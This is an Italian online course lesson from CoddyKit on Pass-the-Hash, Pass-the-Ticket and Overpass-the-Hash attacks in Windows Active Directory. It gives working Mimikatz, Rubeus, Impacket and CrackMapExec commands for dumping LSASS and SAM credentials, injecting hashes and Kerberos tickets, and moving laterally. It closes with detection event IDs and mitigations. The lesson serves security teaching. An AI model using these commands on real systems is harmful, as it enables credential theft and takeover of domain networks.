Attacchi Pass-the-Hash e Pass-the-Ticket
Utilizzate gli hash delle credenziali e i ticket Kerberos per muovervi lateralmente senza conoscere le password in chiaro.
Attacchi Pass-the-Hash e Pass-the-Ticket è una lezione Cyber Security Academy gratuita su CoddyKit. Questa è la lezione 2 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cyber Security Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cyber Security Academy include 4 lezioni in totale.
Perché esistono questi attacchi
I protocolli delle credenziali Windows memorizzano i segreti di autenticazione, come gli hash NTLM e i ticket Kerberos, in memoria. Un attaccante con privilegi SYSTEM può estrarre questi segreti e riutilizzarli per autenticarsi come altri utenti senza conoscerne le password.
Estrazione degli hash NTLM con Mimikatz
Mimikatz è il principale strumento di estrazione delle credenziali in Windows. Eseguito come SYSTEM/Administrator, legge la memoria del processo LSASS per estrarre hash NTLM e credenziali in chiaro.
# Run mimikatz as Admin:
mimikatz.exe
# Enable debug privilege
privilege::debug
# Dump LSASS credentials
sekurlsa::logonpasswords
# Dump local SAM hashes
lsadump::samPass-the-Hash (PtH) con Mimikatz
PtH inietta un hash NTLM in una nuova sessione senza conoscere la password in chiaro. L'hash consente l'autenticazione ai servizi remoti tramite NTLM ed è efficace per il movimento laterale verso altri host Windows.
# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
/ntlm:aad3b435b51404eeaad3b435b51404ee \
/run:cmd.exe
# Opens cmd.exe authenticated as that userPass-the-Hash con Impacket
Impacket fornisce strumenti Python per PtH: psexec.py, smbexec.py e wmiexec.py accettano direttamente hash NTLM per l'esecuzione remota di comandi.
# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
-hashes aad3b435...:8846f7eaee8fb117...
# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
-hashes :8846f7eaee8fb117ad06bdd830b7586cEstrazione dei ticket Kerberos
Anche i ticket Kerberos sono memorizzati nella memoria di LSASS. Mimikatz li estrae; Rubeus è lo strumento specializzato per le operazioni sui ticket Kerberos in Windows.
# Mimikatz: export all tickets
sekurlsa::tickets /export
# Rubeus: list tickets
Rubeus.exe triage
# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgtPass-the-Ticket (PtT)
PtT inietta un ticket Kerberos rubato nella sessione corrente. Il ticket consente di autenticarsi ai servizi come il proprietario originale del ticket: non servono né hash né password.
# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi
# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klistDump remoto di LSASS
Da un punto d'appoggio, esegua il dump remoto di LSASS usando CrackMapExec o secretsdump di Impacket: non è necessaria una sessione interattiva sul sistema di destinazione.
# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa
# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100Percorsi di movimento laterale
Dopo aver ottenuto hash o ticket, si muova lateralmente: utilizzi PtH su altre macchine sfruttando il riutilizzo degli account amministratore locale, utilizzi PtT per accedere ai servizi del dominio e aumenti i privilegi verso l'amministratore di dominio prendendo di mira gli account privilegiati.
Rilevamento di PtH e PtT
I difensori rilevano PtH tramite: Event ID 4624 (accesso) con tipo di accesso 3 e senza un accesso interattivo corrispondente, anomalie nell'autenticazione NTLM e firme di Mimikatz in memoria o su disco.
# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential useMitigazioni
Le principali mitigazioni sono: abilitare Credential Guard, che protegge LSASS tramite la virtualizzazione; limitare il riutilizzo degli account amministratore locale tra le macchine (LAPS); imporre l'uso del gruppo Protected Users per gli account privilegiati; e disabilitare NTLM dove possibile.
Overpass-the-Hash
Overpass-the-Hash converte un hash NTLM in un TGT Kerberos. È utile negli ambienti in cui NTLM è bloccato ma Kerberos è disponibile, oppure quando serve un TGT per ulteriori attacchi Kerberos.
# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
/ntlm:8846f7eaee8fb117ad06bdd830b7586c \
/run:powershell.exe
# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...Verifica rapida
Quale funzionalità di sicurezza di Windows protegge l'archiviazione delle credenziali di LSASS tramite la virtualizzazione?
Riepilogo: PtH e PtT
Pass-the-Hash e Pass-the-Ticket costituiscono la base del movimento laterale in Active Directory. Entrambi sfruttano la memorizzazione nella cache delle credenziali Windows in LSASS. Mimikatz e Impacket rendono l'estrazione e il riutilizzo molto semplici. Si difenda con Credential Guard, LAPS, il gruppo Protected Users e un monitoraggio rigoroso degli eventi di autenticazione NTLM e Kerberos.
Impara Cyber Security Academy con un tutor IA — gratis
Scrivi ed esegui vero codice nel tuo browser, ricevi aiuto istantaneo da un tutor IA disponibile 24/7, e riprendi da dove hai lasciato sul web o nell'app.
- Corsi
- 76
- Lezioni
- 303
Domande Frequenti
La lezione «Attacchi Pass-the-Hash e Pass-the-Ticket» è gratuita?
Sì — il testo completo di «Attacchi Pass-the-Hash e Pass-the-Ticket» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cyber Security Academy, passa a CoddyKit PRO. Il corso Cyber Security Academy include 4 lezioni in totale.
Cosa imparerò in «Attacchi Pass-the-Hash e Pass-the-Ticket»?
Utilizzate gli hash delle credenziali e i ticket Kerberos per muovervi lateralmente senza conoscere le password in chiaro. Eserciti Cyber Security Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Cyber Security Academy?
Non è richiesta alcuna esperienza precedente. Cyber Security Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 2 di 4.
Quanto tempo richiede la lezione «Attacchi Pass-the-Hash e Pass-the-Ticket»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Cyber Security Academy?
Sì. Ogni lezione Cyber Security Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Autenticazione Windows: NTLM e Kerberos
- Attacchi Pass-the-Hash e Pass-the-Ticket
- Kerberoasting e AS-REP Roasting
- Hardening di Active Directory